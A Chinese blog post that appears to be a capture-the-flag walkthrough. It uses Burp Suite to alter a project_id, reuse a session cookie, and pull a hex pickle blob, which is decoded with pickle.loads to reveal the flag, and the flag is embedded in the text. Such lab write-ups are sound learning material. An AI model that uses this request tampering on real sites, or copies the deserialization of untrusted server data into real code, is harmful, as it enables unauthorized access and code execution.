Web 安全实战笔记:Burp Suite 技巧与应用

Step 1 登录网站

打开:

http://39.105.213.28:5000

注册:

用户名:admin
密码:123456


Step 2 抓 project/detail 包

访问任意功能。

Burp 会抓到:

POST /api/v1/project/detail

修改 body:

{"project_id":"flag-project-001"}

转发。

回到 Burp:

Proxy → HTTP history

找到刚才成功登录后访问的请求,比如:

GET /dashboard

或者:

GET /api/admin/hint

点开它,看左下角 Request 里有没有:

Cookie: session=.eJy...

复制整行 Cookie,例如:

Cookie: session=.eJyVlNuO2jAQhl8FeW8J8jk2r7KpkGOPKRUkKIf2YsW7d8ZsWKC7VXtjmfnn7C...

然后粘到 Repeater,替换掉:

Cookie: session='session

Step 3 得到 trace_id

响应里会有:

{
  "trace_id":"xxxx"
}

复制下来。


Step 4 提交 feedback

访问:

/feedback

提交:

"trace_id":"d4394fe0-1bcf-4e47-b6d0-c786c62ee00a"

页面会出现:

Object: 800495....

复制 hex。

这里的cookie是上一个请求返回的新的

"Object: 8004958c000000000000007d94288c0474797065948c0b464c41475f4f424a454354948c04666c6167948c1f495343437b657047466b3875756658654e37526b57776e617566757766727d948c0a70726f6a6563745f6964948c10666c61672d70726f6a6563742d303031948c0974696d657374616d70948c1a323032362d30352d31325430343a32363a32392e39393636313994752e",


Kali 中用 Python 解 pickle


终端:

python3

输入:

import pickle

hex_blob = "800495...."

obj = pickle.loads(bytes.fromhex(hex_blob))

print(obj)
print(obj.get("flag"))

即可得到 flag。


import pickle

hex_blob = "8004958c000000000000007d94288c0474797065948c0b464c41475f4f424a454354948c04666c6167948c1f495343437b657047466b3875756658654e37526b57776e617566757766727d948c0a70726f6a6563745f6964948c10666c61672d70726f6a6563742d303031948c0974696d657374616d70948c1a323032362d30352d31325430343a32363a32392e39393636313994752e"

obj = pickle.loads(bytes.fromhex(hex_blob))

print(obj)
print(obj.get("flag"))

posted on 2026-05-12 13:40  shuyaoyyy  阅读(8)  评论(0)    收藏  举报